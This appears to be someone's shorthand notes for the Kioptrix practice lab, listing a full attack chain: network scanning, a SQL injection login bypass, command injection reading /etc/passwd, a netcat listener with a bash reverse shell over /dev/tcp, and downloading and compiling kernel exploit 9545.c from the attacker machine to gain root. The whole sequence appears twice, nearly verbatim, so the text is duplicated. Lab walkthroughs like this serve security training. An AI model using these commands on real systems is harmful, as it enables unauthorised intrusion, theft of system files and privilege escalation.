netdiscover -f -r
nmap -sS -T4 -A
nikto -host -port 80 -output nikto.html
SQL injection
username admin and password 'OR'1'='1
ping;cat /etc/passwd
;uname -ar
on kali linux: run nc -nlvp 443
on kioptrix ; bash -i >& /dev/tcp/ 0>&1
you will get shell access on kali
run whoami
It will show apache
Now go back to kali
cat /etc/*-release it will show OS 4.5
run searchsploit -w linux kernel CentOS
9545.c this one is for privilege escalation
python -m SimpleHTTPServer 80
wget http://kalilinuxIP/9545.c
after file getting downloaded
gcc -o priv 9545.c
chmod 755 priv
whoami u will see root
cat .bash_history
nmap -sS -T4 -A
nikto -host -port 80 -output nikto.html
SQL injection
username admin and password 'OR'1'='1
ping;cat /etc/passwd
;uname -ar
on kali linux: run nc -nlvp 443
on kioptrix ; bash -i >& /dev/tcp/ 0>&1
you will get shell access on kali
run whoami
It will show apache
Now go back to kali
cat /etc/*-release it will show OS 4.5
run searchsploit -w linux kernel CentOS
9545.c this one is for privilege escalation
python -m SimpleHTTPServer 80
wget http://kalilinuxIP/9545.c
after file getting downloaded
gcc -o priv 9545.c
chmod 755 priv
whoami u will see root
cat .bash_history